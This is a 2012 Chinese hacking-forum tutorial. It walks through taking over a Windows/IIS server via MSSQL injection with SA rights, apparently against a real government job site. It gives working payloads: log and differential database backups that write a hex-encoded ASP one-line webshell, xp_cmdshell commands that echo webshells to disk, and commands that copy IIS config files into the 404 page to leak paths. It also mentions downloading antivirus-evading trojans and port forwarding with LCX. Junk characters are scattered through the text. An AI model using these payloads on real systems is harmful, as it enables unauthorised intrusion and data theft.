找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2177|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————
) y: k+ M% F4 R! y7 i) @" h
: _  ^$ l' I5 A8 y: Z* F' m7 F- A
                                                             欢迎高手访问指导,欢迎新手朋友交流学习。
) y8 Q" f8 z! q4 b9 F& M+ l: \8 X5 N9 m% }. N1 D( ]
                                                                 + u; e3 s/ K% H) F8 J
                                                                 
# F2 P7 K# c: X3 F! v# C( d( U; v                                                                  论坛: http://www.90team.net/
  A+ S/ ]# t6 {. X7 _! ?0 E( Z6 q3 s: }; ~

, y, S" d2 L5 t  g& @. G0 E4 O4 I
友情检测国家人才网- u  L1 t% O, l6 [, t
. y" E: L* ]: ]! V: K0 {' g
1 o- M+ Q7 K) _! B4 Q
内容:MSSQL注入SA权限不显错模式下的入侵
! f5 P- |7 F( p$ h8 u+ ]+ u5 p% g4 ?& ]0 O
6 ]5 \: A! I; ?. W2 E- T' W
一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。
6 k' r8 b* O" J# P, j  h- B$ g8 @- U5 F1 v- J% r6 ?$ N7 i
我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。2 ~0 w, E) ]* c

7 ^7 X- y$ |' h' W6 r/ m# v3 t3 `9 Z5 E) T! A) T8 p
这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
$ f" T' n4 b; M+ }0 ]$ E! r, G" Y: }3 {9 D
思路:  Y1 ~* K/ l" O/ n% t; s
' z1 n  p* U5 d
首先:: {4 v) b% |* a% K: [
& T& I2 J( |2 J1 @5 `
通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。# v* m9 i* A1 a! c2 [- V; I" C0 n1 m4 Q
, }2 m+ p  o2 M, |0 {% N
1.日志备份获得Webshell
# e! t' Q& V9 r4 X& J3 s
# E, W" s4 t& s! b2.数据库差异备份获得Webshell6 A0 ?% W$ T, A
- Q7 c) d" ?/ X
4.直接下载免杀远控木马。; I( `; S9 H% v( W7 n

/ V* ~- }* ?. A7 F& K6 j5.直接下载LCX将服务器端口转发出来. l* `, D6 y" D9 u

. _5 O* c( ]% v8 \  a7 V& b6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。" \: j) R* }6 D" p0 a

) A1 o, w3 }8 t( t( Y( n. |6 d
( s1 o4 y! {* S9 m/ G* C$ n- z  T4 e; [; n, H( P
在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了, . N6 H& Y1 y9 M3 B! B
8 O% e5 W+ i8 C; Z( E
我直接演示后面一个方法; Q# t3 s; Z; n& X

; z- u! }( b* y7 V' q1 ^
  V4 V! w: m5 o0 Z- G分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL / l, f7 F$ H/ U

" f- s( x5 N0 O  R/ Q9 x( _2 ?2 K6 j) X
8 p9 F- H' ~$ {- }5 M  l

+ Z- j0 J7 j$ n, R8 ^2 `◆日志备份:' S! m2 R. k1 @1 A8 U( {1 b

( r. b& m. h) ]: h
; g8 ?; K- q8 m- G. H6 x8 H, w# A1 [1. 进行初始备份- @' S- I0 L' r/ o
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--
) ?" g8 T6 T# I1 m. U
, P# C( f7 d8 S: W, l5 D2. 插入数据& x* h& U+ Z, b. `* f8 t$ @
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
/ M6 d; L4 V( E; D% b4 o- v8 ~  @* x" {
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>1 b# d  A3 ]7 `. E
  % I9 M# w% _: Q# z6 w1 ^6 N+ ]7 k
3. 备份并获得文件,删除临时表
# f# o" U( B" i" E;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--$ ?( _4 G+ q- i* n  w9 Y' s& C

- K! E, n2 A  u  G& m4 y5 A, C& a' h  P' ]
) e' @& B: M8 a2 R, C
◆数据库差异备份$ }+ l% r" A5 s6 [1 ]/ x6 E
, m% p0 O* g" ]% A
(1. 进行差异备份准备工作+ C# N. j* {5 S; Z( }/ B  A$ O
; {4 [& S7 C/ l* H  o* o* l7 }
;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
$ M+ I5 a6 r# ~* _  i
5 L; e% g! R/ G/ p& d: }上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码
1 D2 ^' C/ p: d5 Q( V
2 k0 i: {9 i. o3 a( q1 g" k+ M
, a4 B& D4 v- l5 A5 [$ M3 U0 K(2. 将数据写入到数据库! W7 U0 @. b" I7 P- b0 }" v
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
0 D, r) H# r% n7 P
* K. g; P! T3 C  I0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
' S( z; h, W3 B- w6 }0 o1 H2 _" I3 w: @8 B# p
3. 备份数据库并清理临时文件9 B( Y, C; W5 s8 G; ~' \  G0 \3 G

) K: Y, l1 A) b0 c, u;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--
! y( P0 Y+ L- x2 O
( B5 d' \" ]& R5 M5 N# p% C0x633A5C746573742E617370  为 c:\test.asp  删除临时文件 ! U3 A. w$ q$ x. E' s8 V6 R

* p  p2 ^$ ?- b/ Y  A6 L! Z9 O4 g2 v( A, Y

, E9 B/ I2 r- X1 q用^转义字符来写ASP(一句话木马)文件的方法:   
3 n$ Q' @1 u9 F$ J( D3 |
3 `# p9 f  P' ^, Z( F1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--
# a7 l4 x) O  b# a, x) _' ]1 ?; k9 `0 @' v0 U+ l, K
2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
! T2 T7 P& B" G6 k. _" M+ L0 k, ~3 A
! b* |5 S6 m  E9 h读取IIS配置信息获取web路径# q3 Y1 A# F% y

) p$ X3 q6 Q+ E& c6 o     
5 A5 E0 _' K% ?9 @3 T% P     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--3 {- `6 j# h5 r" `& A6 ?
0 g) x0 d: h# L$ g& h0 m8 N
执行命令
) c' [7 m( q+ \7 `( W* ^+ L, S7 n     3 A/ s; V1 v- o% W2 X9 |& G
     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--: E8 n7 V2 E: h" w6 V0 }

3 n3 _+ \# k$ x. [
# E6 U' q" l; |/ X
8 K( h6 l3 c% H  U: Z# g: s& `  c4 p! e# |5 x6 D
5 `9 F5 A4 p4 C# ^/ B* L; q

6 e3 ?. t  N$ z( Y+ f: w# g
1 e0 h, Q0 I# G& h2 Z0 [
& V" A$ f" Z0 z3 z8 i& T! d6 S' |, S! O; x4 b
: L- H  Y7 ?6 F( P- n, |' @6 Y
. t5 a: w% G: F
0 e: C0 s) N$ Y, ], D& u2 i2 E# f) T1 ^
4 F, v3 }% q! g, P! x7 o5 j% b1 G4 C

6 m0 w% e8 q/ ^5 a* O0 H4 ~/ J
: y0 g; B( O, v
  v" s( m$ _$ ]7 F' f# {5 u* [9 R: b; q9 t
6 s' |, M) m3 H& e
4 T) j1 O+ ^8 }: M5 K
+ }& u5 m# w+ A' f2 a  D' j4 Y

; P3 W5 Y, i5 l+ P: Q3 D& {* }) T: w- |

; ?8 e! U4 A8 e. G1 n' S' X; g1 s; P; @5 e6 m. U* L; a9 ~. Y- G

* R$ R1 D4 H0 B$ o& R" i# }) c: u8 K/ _: x

. O5 }/ B3 N- a6 i8 |6 s& {3 D7 j, D, z- R! ?1 V* g. T

3 u9 j! s9 I& k
- \7 t! F7 S& M
" T1 @, K% @7 H1 @( I& n- t% V2 \( B

9 U; V5 R% q( d% ]
3 y3 v; K8 c* S& A  Y% ]
6 a" X. \' Y& S) o& n3 Y
$ u3 p5 g! U3 ]7 ~5 V1 |, B/ f5 r
/ ?( O, n3 K5 f; G- e( V, ~( Y$ D) T* k

, K: O0 c# i0 Y2 v4 x+ V% a9 E" W( O* r  W  X

( n. {- q' b- e8 n1 e' y! _# w9 ^* B* y1 I) t/ ^( i

. |( B$ x& A: J' Q7 A
( E% |- w. m* s. K( Z( V9 e9 h  L/ u9 M; b0 D1 |; a

2 J- h$ Y: Z. v2 P2 L9 k
" `% j6 G3 R- I3 g5 m6 l% H8 U0 J# U  F" r: b) r7 V/ B
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表